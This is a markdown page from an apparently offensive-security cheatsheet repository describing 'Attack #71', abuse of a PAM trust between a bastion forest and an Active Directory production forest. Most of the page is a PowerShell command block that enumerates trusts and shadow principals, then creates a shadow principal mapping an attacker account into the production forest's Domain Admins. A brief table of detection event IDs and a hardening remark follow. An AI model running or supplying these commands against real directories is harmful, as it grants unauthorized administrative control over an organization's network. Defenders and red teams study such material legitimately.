daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-71-pam-trust-abuse-bastion-forest.md (3369B)


      1 ---
      2 title: "Attack #71 โ€” PAM Trust Abuse (Bastion Forest)"
      3 description: "Get-ADTrust -Filter {TrustType -eq \"ForestTransitive\"} | Where ForestTransitive -eq $true netdom trust corp.local /domain:bastion.local /verify"
      4 category: active-directory
      5 subcategory: "Trust Abuse"
      6 tags: ["active-directory", "privilege-escalation"]
      7 tools: ["PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Nine/๐Ÿ”ถ Attack #71 โ€” PAM Trust Abuse (Bastion Forest).md"
     11 ---
     12 # ๐Ÿ”ถ Attack #71 โ€” PAM Trust Abuse (Bastion Forest)
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 **Privileged Access Management (PAM) trust** is a special forest trust type introduced in Server 2016 for **bastion forest** architectures. It enables time-limited group memberships via "shadow principals" โ€” users in the bastion forest get temporary membership in privileged groups of the production forest. If the bastion forest is compromised, or if the PAM trust is misconfigured, an attacker can abuse shadow principals to gain persistent, time-unlimited admin access to the production forest.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **PAM trust exists** | Between production and bastion forest |
     27 | **Compromise bastion forest** | Or misconfigured PAM trust |
     28 
     29 ***
     30 
     31 ## ๐Ÿ’ป Full Commands
     32 
     33 ```powershell
     34 # โ”€โ”€ Enumerate PAM trust โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     35 Get-ADTrust -Filter {TrustType -eq "ForestTransitive"} | Where ForestTransitive -eq $true
     36 netdom trust corp.local /domain:bastion.local /verify
     37 
     38 # โ”€โ”€ Find shadow principals โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     39 Get-ADObject -SearchBase "CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local" \
     40   -Filter * -Properties *
     41 
     42 # โ”€โ”€ If bastion is compromised โ€” create shadow principal mapping โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     43 # From bastion forest as DA:
     44 New-ADObject -Type "msDS-ShadowPrincipal" -Name "shadow-DA" \
     45   -Path "CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local" \
     46   -OtherAttributes @{
     47     'msDS-ShadowPrincipalSid' = (Get-ADGroup "Domain Admins" -Server corp.local).SID
     48     'member' = (Get-ADUser attacker -Server bastion.local).DistinguishedName
     49   }
     50 # attacker in bastion forest now has DA rights in corp.local production forest
     51 ```
     52 
     53 ***
     54 
     55 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     56 
     57 | Event ID | Source | What to Look For |
     58 |---|---|---|
     59 | **4624** | Security Log | Authentication via PAM trust from bastion forest |
     60 | **5136** | Security Log | Shadow principal creation/modification |
     61 
     62 ***
     63 
     64 ## ๐Ÿ”— Attack Chain Context
     65 
     66 ```
     67 [PAM Trust] โ”€โ”€โ†’ Bastion Forest Compromise โ†’ Production Forest Admin
     68          โ”‚
     69          โ”œโ”€โ”€โ†’ โš ๏ธ Rare โ€” only exists in environments with Server 2016+ bastion forests
     70          โ”œโ”€โ”€โ†’ ๐Ÿ”— Shadow principals = temporary group membership across trusts
     71          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: harden bastion forest, monitor shadow principal changes
     72 ```
     73 
     74 ***
     75 
     76 > โœ… **Attack #71 โ€” PAM Trust Abuse complete.**
     77 
     78 ***
     79 
     80 > ๐Ÿ **Category 9 โ€” Trust & Forest Attacks is now COMPLETE (4/4 attacks).**